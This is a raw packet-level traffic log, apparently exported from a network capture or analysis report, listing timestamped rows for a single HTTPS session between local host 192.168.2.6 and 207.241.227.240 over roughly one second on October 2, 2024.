Oct 2, 2024 05:28:17.349061012 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.349077940 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.349117041 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.351718903 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.351736069 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.351778984 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.351789951 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.351826906 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.351838112 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.401226997 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.401247978 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.401325941 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.401338100 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.401379108 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.401606083 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.401623011 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.401812077 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.401819944 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.401861906 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.401994944 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.402010918 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.402062893 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.402070999 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.402107000 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.402815104 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.402831078 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.402875900 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.402884007 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.402918100 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.403034925 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.403050900 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.403098106 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.403109074 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.403145075 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.403500080 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.403527975 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.403569937 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.403578043 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.403609991 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.435883045 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.435904980 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.436006069 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.436023951 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.436069012 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.438657999 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.438673019 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.438725948 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.438735008 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.438771963 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.488219023 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.488236904 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.488333941 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.488347054 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.488392115 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.488671064 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.488687992 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.488759995 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.488769054 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.488806963 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.489027023 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.489042044 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.489088058 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.489095926 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.489134073 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.489532948 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.489548922 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.489603996 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.489612103 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.489648104 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.490379095 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.490395069 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.490446091 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.490453959 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.490494013 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.490674973 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.490689993 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.490756989 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.490763903 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.490812063 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.522839069 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.522860050 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.522922039 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.522948027 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.522964001 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.522991896 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.525629044 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.525645018 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.525718927 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.525727034 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.525773048 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.575011969 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.575031996 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.575150967 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.575165987 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.575215101 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.575412035 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.575428963 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.575486898 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.575495005 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.575527906 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.576078892 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.576093912 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.576147079 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.576153994 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.576195002 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.576970100 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.576988935 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.577049017 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.577056885 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.577094078 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.577439070 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.577461958 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.577514887 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.577523947 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.577555895 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.577799082 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.577815056 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.577867031 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.577873945 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.577907085 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.609471083 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.609487057 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.609601021 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.609613895 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.609664917 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.612582922 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.612597942 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.612658978 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.612668037 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.612704039 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.662022114 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.662046909 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.662134886 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.662146091 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.662185907 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.662323952 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.662338972 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.662379980 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.662386894 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.662415981 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.662431955 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.662791967 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.662806988 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.662862062 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.662869930 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.662909985 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.663911104 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.663924932 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.663964033 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.663969994 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.663995981 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.664014101 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.664268017 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.664284945 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.664336920 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.664345026 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.664381027 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.664701939 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.664716005 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.664764881 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.664772987 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.664810896 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.696470976 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.696489096 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.696578979 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.696592093 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.696628094 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.699616909 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.699632883 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.699692965 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.699701071 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.699738026 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.748969078 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.748991013 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.749083996 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.749094009 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.749134064 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.749324083 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.749341011 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.749396086 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.749402046 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.749438047 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.749767065 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.749788046 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.749821901 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.749829054 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.749855042 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.749874115 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.750813961 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.750835896 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.750889063 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.750896931 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.750932932 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.751176119 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.751195908 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.751240969 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.751247883 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.751271009 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.751286983 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.751684904 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.751701117 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.751745939 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.751753092 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.751791954 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.783740997 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.783767939 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.783863068 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.783874989 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.783917904 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.786370039 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.786386967 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.786468029 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.786475897 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.786515951 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.835896969 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.835916042 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.836038113 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.836049080 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.836088896 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.836194038 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.836208105 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.836260080 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.836267948 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.836306095 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.836741924 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.836756945 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.836815119 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.836822987 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.836853981 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.837758064 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.837774038 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.837827921 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.837835073 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.837873936 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.838210106 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.838227034 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.838282108 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.838289976 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.838330984 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.838625908 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.838640928 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.838696003 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.838704109 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.838743925 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.870388031 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.870408058 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.870506048 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.870523930 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.870568991 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.873292923 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.873308897 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.873361111 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.873369932 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.873408079 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.923207045 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.923224926 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.923394918 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.923408985 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.923455000 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.923553944 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.923569918 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.923615932 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.923623085 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.923660994 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.924081087 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.924103022 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.924273014 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.924280882 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.924325943 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.925045013 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.925060034 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.925117970 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.925124884 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.925164938 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.925416946 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.925431967 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.925482988 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.925493956 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.925530910 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.925796986 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.925817013 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.925853968 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.925862074 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.925889015 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.925908089 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.957359076 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.957385063 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.957606077 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.957653046 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.957706928 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.960154057 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.960172892 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.960232973 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:17.960247040 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:17.960283041 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.010631084 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.010653019 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.010796070 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.010823965 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.010874033 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.010937929 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.010952950 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.011007071 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.011013985 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.011054993 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.011307955 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.011323929 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.011379957 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.011392117 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.011428118 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.011995077 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.012010098 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.012077093 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.012084007 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.012125015 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.012234926 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.012249947 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.012293100 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.012300014 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.012325048 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.012332916 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.012615919 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.012630939 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.012685061 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.012693882 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.012727976 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.044313908 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.044331074 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.044450998 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.044460058 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.044502974 CEST	49711	443	192.168.2.6	207.241.227.240
Oct 2, 2024 05:28:18.047079086 CEST	443	49711	207.241.227.240	192.168.2.6
Oct 2, 2024 05:28:18.047094107 CEST	443	49711	207.241.227.240	192.168.2.6
